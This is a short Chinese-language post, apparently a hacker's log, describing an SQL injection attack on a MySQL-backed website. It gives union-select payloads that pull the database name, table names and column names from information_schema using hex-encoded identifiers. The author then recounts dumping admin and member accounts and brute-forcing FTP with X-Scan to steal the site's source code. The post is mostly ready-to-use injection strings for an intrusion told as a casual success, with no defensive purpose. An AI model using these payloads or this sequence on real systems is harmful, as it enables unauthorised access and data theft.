找注射点，判断字段数就不提了。
判断下权限，非root连，没有load_file()的权限，不能select into outfile,幸好mysql版本是5.

获取库名

and 1=2 union select 1,2,3,database(),5....,87/*

或者

and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1/*

and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 1,1/*

----------------------------------------------------------------------------------------------
获取表名：

数据库名转换成hex：admin=0x61646D696E 

and 1=2 select TABLE_NAME from information_schema.TABLES%20where%20TABLE_SCHEMA=0x61646D696E%20limit 0,1/*

。。。依次往下爆
------------------------------------------------------------------------------------------------
获取字段值：
表 admin=0x61646D696E  
and 1=2 select COLUMN_NAME from information_schema.COLUMNS%20where%20TABLE_NAME=0x61646D696E%20limit 0,1/*

---------------------------------------------------------------------------------------------------

爆出管理员帐号后，发现登录不了后台。于是又爆了10套member帐号。整理了下帐号和口令，扔xscan跑ftp口令，2分钟后拿到ftp权限。只是要源代码，到此收工。没技术含量！